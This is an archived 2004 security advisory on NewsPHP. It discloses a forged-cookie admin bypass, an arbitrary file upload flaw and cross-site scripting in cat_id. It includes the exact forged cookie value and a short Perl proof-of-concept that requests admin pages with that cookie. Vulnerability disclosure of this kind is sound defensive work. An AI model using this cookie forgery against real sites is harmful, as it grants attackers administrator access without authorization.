logo Home

Untitled Document

Home > Archives Advisories > Articles

NewsPHP Admin Access and Cross Site Scripting Vulnerability
Date: 2004-04-12

Security-Corporation ID : SC-1007
URL : http://www.security-corporation.com/articles-20040412-001.html
Author : Manuel Lopez <mantra@gulo.org>
Product : NewsPHP (All versions)
Source Message Contents :

#Title: XSS, Admin Access via Cookie and File Upload vulnerability in

#Software: NewsPHP (All versions)
#Vendor: http://www.newsphp.com
#Underlying OS: All


NewsPHP is a perfect solution for creating web publishing system, like an
online magazine, newspaper, TV/Radio or news portals. It works also as a
Content Management System that is easy to install and manage without having
to FTP upload your pages every time you need to update it.


A security vulnerability in the product allows attackers to cause the
product to think they are administrators by placing a fake Administrator
cookie on their computer.

A File Upload vulnerability in the Admin panel allow authenticated users
upload arbitrary files instead of a video file.

This product also is vulnerable to the Cross-Site Scripting vulnerability.

#Cookie Vulnerability#

The flaw is caused because cookie data is not properly checked for
administrator rights.

This is the cookie and POC to gain administrator privileges in newsPHP:

### autorized=admin; root=admin ###

## PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP) ##------------

#!/usr/bin/perl -w
## Example: POCnws.pl www.vulnerweb.com newsadmin POCnws.htm

use IO::Socket;
if (@ARGV < 3)
print "\n\n";
print "PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP)\n\n";
print "Usage: POCnws.pl [host] [directory] [file.htm]\n\n";
print "By: Manuel Lopez mantra at gulo.org\n";
print "\n\n";

$host = $ARGV[0];
$directorio = $ARGV[1];
$fichero = $ARGV[2];

print "\n";
print "----- Conecting .. <====\n\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "$host",PeerPort => "80") || die "$socket error $!";
print "====> Conected\n";
print "====> Sending Data .. \n";
$socket->print(<<fin) or die "write: $!";
GET http://$host/$directorio/ HTTP/1.1
Cookie: autorized=admin; root=admin

print "====> OK\n";
print "====> Generating $fichero ...\n";
open( Result, ">$fichero");
print Result while <$socket>;
close Result;


#Cross-Site Scripting#

A remote user can conduct cross-site scripting attacks due to an input
validation flaw in cat_id variable.


#File Upload vulnerability#

An user with privileges can upload executable code instead of a video in the

Panel. Once the code has been uploaded an user can execute the code by
calling the file, this

will be executed with the privileges of the web server.


There is no solution at the moment.
Vendor contacted Apr 3 2004


Manuel Lopez, mantra@gulo.org


arrowSearch Advisories


Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.


About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy